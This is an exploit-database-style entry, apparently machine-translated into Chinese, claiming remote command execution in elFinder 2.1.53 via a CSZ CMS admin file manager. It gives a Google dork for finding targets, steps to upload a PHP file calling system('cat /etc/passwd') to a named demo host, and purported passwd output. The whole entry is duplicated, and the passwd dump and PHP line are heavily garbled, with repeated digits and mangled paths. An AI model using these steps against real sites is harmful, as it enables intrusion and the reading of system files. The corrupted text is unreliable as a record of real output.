#exploit title: Elfinder Web文件管理器版本: 2.1.53远程命令执行
#日期: 23/11/2023
#利用作者: TMRSWRR
#Google Dork: Intitle:'elfinder 2.1.53'
#供应商HomePage: https://studio-42.github.io/elfinder/
#软件link: https://github.com/studio-42/elfinder/archive/refs/refs/tags/2.1.53.zip
#版本: 2.1.53
#测试在: https://www.softaculous.com/apps/cms/csz_cms
1)输入管理面板并转到此URL https://demos1.softaculous.com/csz_cmsstym1wtmnz/admin/filemanager
2)单击模板主并上传此test.php文件:
php回声系统('cat /etc /passwd');
3)https://demos1.softaculous.com/csz_cmsstym1wtmnz/test.php
root:x3:0333:root3:/root3:/bin/bash bash bin3:x33333333333333333333:13360bin33:bin:/bin:/bin3360/sbin/nologin nolologin/nologin DAEMON:X333333333333333333333:/sbin/nologin ADM:x333333333333333333333333:/var/var/var/adm 3:/sbin/nologin/nologin LP:x33333333333333333:/var/spool/lpd:/sbin/nologin sync333333333333333333333333333333:03:Sync3333333:/sbin3333:/bin/binc/binc shutdown3:x33333:3603360Shutdown3:/sbin:/sbin/sbin/shutdown halt:x333333333333333333333:halt33333:/sbin3360/sbin3333:/allt/sbin/sbin/halt Mail:x3333333:123:mail:/var/spool/mail:/sbin/nololigin operator333:11:113333333333:Operator333:/root:/root3360/nologin/nologin Games:x:12:1003360games3:/usr/gasmes:/sbin/sbin/nolologin ftp:x:1433333333333333333333333333333333:/vtpp user3:/var/var/vtp333333333333333333333:/nologinin/nologinin/nologin inolinin/nologinin in nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin Systemd-Network :x333333333333333333333333:Systemd网络管理:/:/:/sbin/nologin DBUS3333333333333333333333333333333333333:SYSTEM MESSS MESSS MESSS MESS MESSES MESSE MESSE MESSE BUS 33:/SBININ NOGIN/SBINININ/NOGIN NOGIN NOGIN/NOGIN NODININ NODININ/polkitd:x333333333:997:user用于Polkitd3:/:/:/sbin/sbin/nologin tss333333333333333:59333333333333333:account,用Trousers用Trousers包装TCS TCD使用DAEMON3:/DEV/NULL:/SBIN/NOLOGIN SSHD:X33333333333333333333333333333
RIVILIVILEGE SSH:/var/var/var/varr/emptle/empty/ship/sshd:/sbin/nologin postfix:x:89:89:/var/spool/postfix:/sbin/nologin chrony:x:997:995:/var/lib/chrony:/sbin/nologin SOFT:X33333333333333333333:/home/home/soft:/sbin/sbin/nologin saslauth3333333333:996333:760763360saslauthd sasslauthd user:/run/run/runol/sass nolog/sass nolog/sass nolog/sass nolog/sbauth nolog sbala nolot mailnull:x:47:47:/var/spool/mqueue:/sbin/nologin smmsp:x:51:51:/var/spool/mqueue:/sbin/nologin EMPS:X3333333333333333333333333:/home/emps3:/bin/bash命名为33:2533333333:253333:Named33: Named3:/var/var/ver nater/ver new :/nologin/nologin exim:x:93:93:/var/spool/exim:/sbin/nologin vmail:x:5000:/var/local/vmail:/bin/bash webuzo:x333333333333333333333333333333333333333333333333:/bin/bash/bash apache33333333333333333333333333333333333:3:/home/home/apache33333333333333333333333333333333333333333333333333333333333333333333:/MySQL:X3333333333333333333333333333:MYSQL Server:/var/lib/mysql:/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/mysql33333333333333333333333333333333333333333333333333333333333333333333333333:MYSQ server:/var/lib/mysql:/bin/false
#日期: 23/11/2023
#利用作者: TMRSWRR
#Google Dork: Intitle:'elfinder 2.1.53'
#供应商HomePage: https://studio-42.github.io/elfinder/
#软件link: https://github.com/studio-42/elfinder/archive/refs/refs/tags/2.1.53.zip
#版本: 2.1.53
#测试在: https://www.softaculous.com/apps/cms/csz_cms
1)输入管理面板并转到此URL https://demos1.softaculous.com/csz_cmsstym1wtmnz/admin/filemanager
2)单击模板主并上传此test.php文件:
php回声系统('cat /etc /passwd');
3)https://demos1.softaculous.com/csz_cmsstym1wtmnz/test.php
root:x3:0333:root3:/root3:/bin/bash bash bin3:x33333333333333333333:13360bin33:bin:/bin:/bin3360/sbin/nologin nolologin/nologin DAEMON:X333333333333333333333:/sbin/nologin ADM:x333333333333333333333333:/var/var/var/adm 3:/sbin/nologin/nologin LP:x33333333333333333:/var/spool/lpd:/sbin/nologin sync333333333333333333333333333333:03:Sync3333333:/sbin3333:/bin/binc/binc shutdown3:x33333:3603360Shutdown3:/sbin:/sbin/sbin/shutdown halt:x333333333333333333333:halt33333:/sbin3360/sbin3333:/allt/sbin/sbin/halt Mail:x3333333:123:mail:/var/spool/mail:/sbin/nololigin operator333:11:113333333333:Operator333:/root:/root3360/nologin/nologin Games:x:12:1003360games3:/usr/gasmes:/sbin/sbin/nolologin ftp:x:1433333333333333333333333333333333:/vtpp user3:/var/var/vtp333333333333333333333:/nologinin/nologinin/nologin inolinin/nologinin in nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin Systemd-Network :x333333333333333333333333:Systemd网络管理:/:/:/sbin/nologin DBUS3333333333333333333333333333333333333:SYSTEM MESSS MESSS MESSS MESS MESSES MESSE MESSE MESSE BUS 33:/SBININ NOGIN/SBINININ/NOGIN NOGIN NOGIN/NOGIN NODININ NODININ/polkitd:x333333333:997:user用于Polkitd3:/:/:/sbin/sbin/nologin tss333333333333333:59333333333333333:account,用Trousers用Trousers包装TCS TCD使用DAEMON3:/DEV/NULL:/SBIN/NOLOGIN SSHD:X33333333333333333333333333333
RIVILIVILEGE SSH:/var/var/var/varr/emptle/empty/ship/sshd:/sbin/nologin postfix:x:89:89:/var/spool/postfix:/sbin/nologin chrony:x:997:995:/var/lib/chrony:/sbin/nologin SOFT:X33333333333333333333:/home/home/soft:/sbin/sbin/nologin saslauth3333333333:996333:760763360saslauthd sasslauthd user:/run/run/runol/sass nolog/sass nolog/sass nolog/sass nolog/sbauth nolog sbala nolot mailnull:x:47:47:/var/spool/mqueue:/sbin/nologin smmsp:x:51:51:/var/spool/mqueue:/sbin/nologin EMPS:X3333333333333333333333333:/home/emps3:/bin/bash命名为33:2533333333:253333:Named33: Named3:/var/var/ver nater/ver new :/nologin/nologin exim:x:93:93:/var/spool/exim:/sbin/nologin vmail:x:5000:/var/local/vmail:/bin/bash webuzo:x333333333333333333333333333333333333333333333333:/bin/bash/bash apache33333333333333333333333333333333333:3:/home/home/apache33333333333333333333333333333333333333333333333333333333333333333333:/MySQL:X3333333333333333333333333333:MYSQL Server:/var/lib/mysql:/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/bin/mysql33333333333333333333333333333333333333333333333333333333333333333333333333:MYSQ server:/var/lib/mysql:/bin/false